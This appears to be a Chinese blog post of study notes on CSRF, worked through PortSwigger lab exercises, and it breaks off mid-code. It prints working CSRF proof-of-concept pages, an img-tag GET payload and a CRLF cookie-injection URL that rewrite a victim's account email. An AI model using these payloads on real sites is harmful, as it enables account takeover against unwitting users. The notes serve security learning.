<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="baidu-site-verification" content="code-nXJP22I4Cn">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"zhangyijian.cn","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":"mac","style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="我看了PwnFunction和liveoverflow的视频，结果发现我接受不了：一方面是虽然我英语水平能听懂，但是很多时候都是努力去听，理解就没大有脑子了；另一方面，我觉得还是我不大适应网课这种获取知识的形式。">
<meta property="og:type" content="article">
<meta property="og:title" content="Cross-site request forgery(CSRF)跨站请求伪造">
<meta property="og:url" content="https://zhangyijian.cn/Notes/Cross-site%20request%20forgery(CSRF)%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html">
<meta property="og:site_name" content="人生边上">
<meta property="og:description" content="我看了PwnFunction和liveoverflow的视频，结果发现我接受不了：一方面是虽然我英语水平能听懂，但是很多时候都是努力去听，理解就没大有脑子了；另一方面，我觉得还是我不大适应网课这种获取知识的形式。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403131645834.png">
<meta property="og:image" content="https://portswigger.net/web-security/csrf/images/site-definition.png">
<meta property="article:published_time" content="2024-03-07T16:00:00.000Z">
<meta property="article:modified_time" content="2024-03-16T13:26:58.155Z">
<meta property="article:author" content="Yijian">
<meta property="article:tag" content="知识&#x2F;cybersecurity">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="CSRF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403131645834.png">

<link rel="canonical" href="https://zhangyijian.cn/Notes/Cross-site%20request%20forgery(CSRF)%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Cross-site request forgery(CSRF)跨站请求伪造 | 人生边上</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">人生边上</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://zhangyijian.cn/Notes/Cross-site%20request%20forgery(CSRF)%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Yijian">
      <meta itemprop="description" content="Just for fun :D">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="人生边上">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Cross-site request forgery(CSRF)跨站请求伪造
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-03-08 00:00:00" itemprop="dateCreated datePublished" datetime="2024-03-08T00:00:00+08:00">2024-03-08</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-03-16 21:26:58" itemprop="dateModified" datetime="2024-03-16T21:26:58+08:00">2024-03-16</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>我看了PwnFunction和liveoverflow的视频，结果发现我接受不了：一方面是虽然我英语水平能听懂，但是很多时候都是努力去听，理解就没大有脑子了；另一方面，我觉得还是我不大适应网课这种获取知识的形式。</p>
<span id="more"></span>
<h2 id="What-is-CSRF"><a href="#What-is-CSRF" class="headerlink" title="What is CSRF?"></a>What is CSRF?</h2><p>CSRF允许攻击者诱导用户执行他们并不想做的行为。</p>
<blockquote>
<p>It allows an attacker to partly circumvent the same origin policy</p>
</blockquote>
<p>这个“绕过”用的非常好，因为（我从上述视频里了解到的），CSRF并没有违反同源策略，恶意网站发出了request，但是并没有收到response（收到了就违反了）。</p>
<h2 id="What-is-the-impact-of-a-CSRF-attack"><a href="#What-is-the-impact-of-a-CSRF-attack" class="headerlink" title="What is the impact of a CSRF attack?"></a>What is the impact of a CSRF attack?</h2><p>上述不想做的行为就包括：改邮箱，改密码，转账（？这能做到？how？）。攻击者甚至能够获得对用户账户的完全控制。如果是高权限账户的话，攻击者就相当于控制web 应用了。</p>
<h2 id="How-does-CSRF-work"><a href="#How-does-CSRF-work" class="headerlink" title="How does CSRF work?"></a>How does CSRF work?</h2><p>CSRF攻击有三个必要条件：</p>
<ol>
<li><p>A relevant action. 应用中存在，攻击者想引诱，用户去做，的操作。可能是特权操作（改变别的用户的权限），或者是针对用户数据的操作（改变用户的密码）</p>
</li>
<li><p>Cookie-based session handling.应用仅靠<code>session cookies</code>来鉴别request的发送者，没有其它机制。</p>
<blockquote>
<p>他在后文中提到，不仅仅是 Cookie-based ，<code>it also arises in other contexts where the application automatically adds some user credentials to requests, such as HTTP Basic authentication and certificate-based authentication.</code></p>
</blockquote>
</li>
<li><p>没有攻击者无法猜测&#x2F;决定的request parameters。比方说，改密码时要验证旧密码，这种情况攻击者就无从下手了。<br>举例：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">POST /email/change HTTP/1.1 </span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>vulnerable-website.com </span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded </span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>30 </span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>session=yvthwsztyeQkAPzeQ5gHgTvlyxHfsAfE</span><br><span class="line"></span><br><span class="line">email=wiener@normal-user.com</span><br></pre></td></tr></table></figure>
<p>这就符合CSRF的条件：</p>
</li>
</ol>
<ul>
<li>改变用户的邮箱。攻击者可以用来重置密码，等等。</li>
<li>application只用<code>session cookie</code>来鉴别request发送者。</li>
<li>攻击者可以简单地确定request parameters。<br>相应地<code>evil page</code>就可以是这样：<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;https://vulnerable-website.com/email/change&quot;</span> <span class="attr">method</span>=<span class="string">&quot;POST&quot;</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;email&quot;</span> <span class="attr">value</span>=<span class="string">&quot;pwned@evil-user.net&quot;</span> /&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">document</span>.<span class="property">forms</span>[<span class="number">0</span>].<span class="title function_">submit</span>();</span></span><br><span class="line"><span class="language-javascript">        </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
这里也提到一个防御机制 <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/csrf#common-defences-against-csrf">SameSite cookies</a></li>
</ul>
<h2 id="How-to-construct-a-CSRF-attack"><a href="#How-to-construct-a-CSRF-attack" class="headerlink" title="How to construct a CSRF attack"></a>How to construct a CSRF attack</h2><p>他说手工构造会很累，特别是参数多的时候，或者是<code>other quirks in the request</code>的情况。所以他就推荐<code>Burp Suite Pro</code>里的<code>CSRF POC generator</code>。emmm，我的评价是：它作为一个公司做的教程，唯一的不足之处可能是这一点。没有去教说怎么自己写工具，而是去推荐自己的工具。世间难有十全十美的东西，可以理解。</p>
<blockquote>
<p>现在我很好奇，他这个lab是怎么做？</p>
</blockquote>
<h4 id="Lab-CSRF-vulnerability-with-no-defenses"><a href="#Lab-CSRF-vulnerability-with-no-defenses" class="headerlink" title="Lab: CSRF vulnerability with no defenses"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/csrf">CSRF vulnerability</a> with no defenses</h4><blockquote>
<p>哦，他给了个exploit Server</p>
</blockquote>
<ol>
<li>但是看起来还是怪怪的，是直接用exploit server那边吗？</li>
<li>没大懂，它为什么<code>craft a respoonse</code>？</li>
<li>看了题解视频，我生成poc是对的，但是我把Server那边改乱了，导致出不来？很疑惑，明白这个Server的作用。</li>
<li>把exploit Server上参数改回去，就没了，解决了（？</li>
<li>我觉得这个lab做的不好</li>
</ol>
<h2 id="How-to-deliver-a-CSRF-exploit"><a href="#How-to-deliver-a-CSRF-exploit" class="headerlink" title="How to deliver a CSRF exploit"></a>How to deliver a CSRF exploit</h2><p>这里提到CSRF的“投放”机制与反射型XSS本质上差不多。</p>
<blockquote>
<p>只能说解答了我的疑惑，为什么这俩这么像。</p>
</blockquote>
<ol>
<li>攻击者可能会同通过邮件&#x2F;社交媒体信息引诱受害者访问，包含恶意HTML的网站</li>
<li>或者是，攻击者把恶意代码放在一个热门的网站中（比方说放在评论中），再等待用户访问。</li>
<li>一些简单的CSRF漏洞利用，会使用GET方法。这种情况下，攻击者甚至都不需要外部网站，只需要直接“feed”受害者一个，存在漏洞的相应域名的恶意URL，就可以了。<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;https://vulnerable-website.com/email/change?email=pwned@evil-user.net&quot;</span>&gt;</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>[[XSS vs CSRF]] ，简单地说CSRF和反射型XSS还是比较像的，XSS一般比CSRF危害大多了。但是CSRF token只能防住它这里的反射型XSS，别地儿防不住，页面上有XSS防不住，存储型那更是防不住。</p>
</blockquote>
</li>
</ol>
<h2 id="Common-defences-against-CSRF"><a href="#Common-defences-against-CSRF" class="headerlink" title="Common defences against CSRF"></a>Common defences against CSRF</h2><ul>
<li>CSRF tokens  服务端生成，分享给客户端，<strong>不可预测</strong>。执行敏感操作时，就要检验request中的CSRF token。给攻击者构建request上强度。</li>
<li>SameSite cookies[[白帽子讲Web安全]]  浏览器安全机制，用来决定向其它网站的请求是否包含cookies。恰当的SameSite 限制可以避免攻击者跨站执行敏感操作。2021年起，chrome强制使用<code>Lax</code>（？）SameSite限制。</li>
<li>Referer-based validation 验证referer头来防御CSRF攻击，不如CSRF token有效。我记得<em>白帽子讲Web安全</em>还专门提了一句，不要忽略<code>referer</code>为空的情况。<br>这些防御措施也可能被绕过。</li>
</ul>
<h1 id="Bypassing-CSRF-token-validation"><a href="#Bypassing-CSRF-token-validation" class="headerlink" title="Bypassing CSRF token validation"></a>Bypassing CSRF token validation</h1><h2 id="What-is-a-CSRF-token"><a href="#What-is-a-CSRF-token" class="headerlink" title="What is a CSRF token?"></a>What is a CSRF token?</h2><blockquote>
<p>这里解答了我的疑惑，怎么<code>share CSRF tokens with the client</code></p>
</blockquote>
<p>方法就是把<code>CSRF tokens</code>放到HTML form中作为一个隐藏参数。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">name</span>=<span class="string">&quot;change-email-form&quot;</span> <span class="attr">action</span>=<span class="string">&quot;/my-account/change-email&quot;</span> <span class="attr">method</span>=<span class="string">&quot;POST&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">label</span>&gt;</span>Email<span class="tag">&lt;/<span class="name">label</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">required</span> <span class="attr">type</span>=<span class="string">&quot;email&quot;</span> <span class="attr">name</span>=<span class="string">&quot;email&quot;</span> <span class="attr">value</span>=<span class="string">&quot;example@normal-website.com&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">required</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;csrf&quot;</span> <span class="attr">value</span>=<span class="string">&quot;50FaWgdOhi9M9wyna8taR1k3ODOR8d6u&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">button</span> <span class="attr">class</span>=<span class="string">&#x27;button&#x27;</span> <span class="attr">type</span>=<span class="string">&#x27;submit&#x27;</span>&gt;</span> Update email <span class="tag">&lt;/<span class="name">button</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>这CSRF tokens防御的原理很简单，就是给攻击者“construct a valid request”上强度。</p>
<blockquote>
<p>这里Note提到，CSRF tokens的传送方式，显著地影响整个机制的安全性。 <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/csrf/preventing">How to prevent CSRF vulnerabilities</a></p>
</blockquote>
<h2 id="Common-flaws-in-CSRF-token-validation"><a href="#Common-flaws-in-CSRF-token-validation" class="headerlink" title="Common flaws in CSRF token validation"></a>Common flaws in CSRF token validation</h2><h3 id="Validation-of-CSRF-token-depends-on-request-method"><a href="#Validation-of-CSRF-token-depends-on-request-method" class="headerlink" title="Validation of CSRF token depends on request method"></a>Validation of CSRF token depends on request method</h3><p>有些应用会在<code>GET</code>方法时忽略token的校验（？，哥们，图啥啊）。所以就可以同通过使用<code>GET</code>方法绕过校验，进行CSRF攻击。</p>
<h4 id="Lab-CSRF-where-token-validation-depends-on-request-method"><a href="#Lab-CSRF-where-token-validation-depends-on-request-method" class="headerlink" title="Lab: CSRF where token validation depends on request method"></a>Lab: CSRF where token validation depends on request method</h4><p>很常规，直接送去CSRF Poc generator即可。注意是修改邮箱地址，所以要对邮箱地址有适当修改，不能和原有邮箱地址相同。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">  <span class="comment">&lt;!-- CSRF PoC - generated by Burp Suite Professional --&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    </span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;https://0a0700170422165c84a237d4006f001a.web-security-academy.net/my-account/change-email&quot;</span> <span class="attr">method</span>=<span class="string">&quot;GET&quot;</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;email&quot;</span> <span class="attr">value</span>=<span class="string">&quot;1<span class="symbol">&amp;#64;</span>2<span class="symbol">&amp;#46;</span>com&quot;</span> /&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;Submit request&quot;</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">      history.<span class="title function_">pushState</span>(<span class="string">&#x27;&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="string">&#x27;/&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">      <span class="variable language_">document</span>.<span class="property">forms</span>[<span class="number">0</span>].<span class="title function_">submit</span>();</span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<h3 id="Validation-of-CSRF-token-depends-on-token-being-present"><a href="#Validation-of-CSRF-token-depends-on-token-being-present" class="headerlink" title="Validation of CSRF token depends on token being present"></a>Validation of CSRF token depends on token being present</h3><p>有些应用token存在时校验，token漏了就不校验了（？铁铁，你在干什么？）</p>
<p>这种情况，攻击者把整个参数移除（不是仅仅移除token）就可以bypass</p>
<h4 id="Lab-CSRF-where-token-validation-depends-on-token-being-present"><a href="#Lab-CSRF-where-token-validation-depends-on-token-being-present" class="headerlink" title="Lab: CSRF where token validation depends on token being present"></a>Lab: CSRF where token validation depends on token being present</h4><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">  <span class="comment">&lt;!-- CSRF PoC - generated by Burp Suite Professional --&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;https://0aa0003b03af321983ab79c500c400e5.web-security-academy.net/my-account/change-email&quot;</span> <span class="attr">method</span>=<span class="string">&quot;POST&quot;</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;email&quot;</span> <span class="attr">value</span>=<span class="string">&quot;1<span class="symbol">&amp;#64;</span>1<span class="symbol">&amp;#46;</span>cn&quot;</span> /&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;Submit request&quot;</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">      history.<span class="title function_">pushState</span>(<span class="string">&#x27;&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="string">&#x27;/&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">      <span class="variable language_">document</span>.<span class="property">forms</span>[<span class="number">0</span>].<span class="title function_">submit</span>();</span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>？，我觉得之前几个topic的lab都不错，怎么这个？这做的有什么意义？<br>做得怪快倒是</p>
</blockquote>
<h3 id="CSRF-token-is-not-tied-to-the-user-session"><a href="#CSRF-token-is-not-tied-to-the-user-session" class="headerlink" title="CSRF token is not tied to the user session"></a>CSRF token is not tied to the user session</h3><p>一些应用不校验token跟session是不是属于同个用户，只是看是不是在global pool里。（这几种情况我是觉得太炸裂了）</p>
<p>这种情况，攻击者就可以用他们自己账户的token实施CSRF攻击。</p>
<h4 id="Lab-CSRF-where-token-is-not-tied-to-user-session"><a href="#Lab-CSRF-where-token-is-not-tied-to-user-session" class="headerlink" title="Lab: CSRF where token is not tied to user session"></a>Lab: CSRF where token is not tied to user session</h4><ol>
<li>通过这个lab，我大致弄明白这边exploit server是怎么回事了。他是为了让你方便，所以有个<code>deliver to victim</code></li>
<li>但是这个lab一直没做成功，总是报错<code>invalid token</code>。我是开了一个窗口，一个隐身窗口。隐身窗口通过看HTML得到<code>csrf token value</code>，然后改另一个窗口的exploit server。</li>
<li>看了solution，明白问题了。题解中的做法是intercept 一个request，复制token后<strong>drop</strong>掉。我没有，我是通过history复制的，所以我复制的token实际上已经不在pool里了。</li>
<li>成功解决！</li>
</ol>
<h3 id="CSRF-token-is-tied-to-a-non-session-cookie"><a href="#CSRF-token-is-tied-to-a-non-session-cookie" class="headerlink" title="CSRF token is tied to a non-session cookie"></a>CSRF token is tied to a non-session cookie</h3><p>一些应用通过”tie the CSRF token to a cookie”防御上述漏洞，但是这个<code>cookie</code>跟用来跟踪sessions的cookie不是同一个。特别是用了两种不同的<code>frameworks</code>时会出现这种情况。</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/email/change</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>vulnerable-website.com</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>68</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>session=pSJYSScWKpmC60LpFOAHKixuFuM4uXWF; csrfKey=rZHCnSzEp8dbI6atzagGoSYyqJqTz5dv</span><br><span class="line"></span><br><span class="line"><span class="language-ini"><span class="attr">csrf</span>=RhV7yQDO0xcq9gLEah2WVbmuFqyOq7tY&amp;email=wiener@normal-user.com</span></span><br></pre></td></tr></table></figure>
<p>这种情况虽然很难exploit但是也是存在漏洞的。如果页面存在，可以让攻击者在受害者的浏览器中设置cookie的行为，就可以实现攻击。</p>
<p>攻击者可以：</p>
<ol>
<li>用他们自己的账号登陆，获得一个有效的token和相关的cookie</li>
<li>利用cookie-settting行为把受害者浏览器中的cookie改成他们的</li>
<li>CSRF攻击中就可以用他们的token了</li>
</ol>
<p>这种情况就是<code>site&#39;s session handling system</code>有漏洞。</p>
<h4 id="Lab-CSRF-where-token-is-tied-to-non-session-cookie"><a href="#Lab-CSRF-where-token-is-tied-to-non-session-cookie" class="headerlink" title="Lab: CSRF where token is tied to non-session cookie"></a>Lab: CSRF where token is tied to non-session cookie</h4><ol>
<li>intercept得到一组<code>cookie</code>和<code>token</code>：<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>csrfKey=xxnYPFByhcRayErdOKa5gpY1MCxNrrjY; session=hlh2fxWCm6vtUYG9tAay9Bwqz5PGJhwg</span><br><span class="line"></span><br><span class="line">email=123%40cn.cn&amp;csrf=sofdIKHTllw9IIkSiH0OmVC6p0I5uGgj</span><br></pre></td></tr></table></figure></li>
<li>登陆另一个账号一看，页面cookie中session值变了，结果csrfkey没变？省的我改了？</li>
<li>但是那他这个跟哪个cookie是联系的呢？应该是csrfkey把，不大可能是session那个</li>
<li>成功改了carlos的邮件地址，但是怎么lab Not solved？</li>
<li>看了题解</li>
<li>题解中指出，把”update email“的request送去Repeater，就会发现改变<code>session</code>cookie会导致登出，改变<code>csrfKey</code>会导致CSRF token 被拒绝，显示二者才是相联系的。</li>
<li><blockquote>
<p>Back in the original browser, perform a search, send the resulting request to Burp Repeater, and observe that the search term gets reflected in the Set-Cookie header. Since the search function has no CSRF protection, you can use this to inject cookies into the victim user’s browser.</p>
</blockquote>
</li>
<li><blockquote>
<p>Create a URL that uses this vulnerability to inject your <code>csrfKey</code> cookie into the victim’s browser:<code>/?search=test%0d%0aSet-Cookie:%20csrfKey=YOUR-KEY%3b%20SameSite=None</code>在访问这个URL之后，就可以设置相应的<code>csrfKey</code><img src="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403131645834.png"></p>
</blockquote>
</li>
<li><blockquote>
<p>Remove the auto-submit <code>&lt;script&gt;</code> block, and instead add the following code to inject the cookie:<code>&lt;img src=&quot;https://YOUR-LAB-ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=YOUR-KEY%3b%20SameSite=None&quot; onerror=&quot;document.forms[0].submit()&quot;&gt;</code></p>
</blockquote>
</li>
<li>灰常复杂啊</li>
<li>也没有做成功，看了视频，好像是要和上一个lab一样drop掉发送的包，来保持csrf token 有效（？</li>
<li>获得cookie：<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Cookie: csrfKey=0fZX8oTxa8mv114Ng4C0zol1JNsXSbUK; LastSearchTerm=test; session=Hjkrsvh9Kll8HlMUfbFtgY2vDYDGcMLc</span><br><span class="line"></span><br><span class="line">email=1%403.com&amp;csrf=UMnkihPvgGFpIxvQ5YH1jeoUFyBPtaeL</span><br></pre></td></tr></table></figure></li>
<li>做完了，最后body如下：<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span 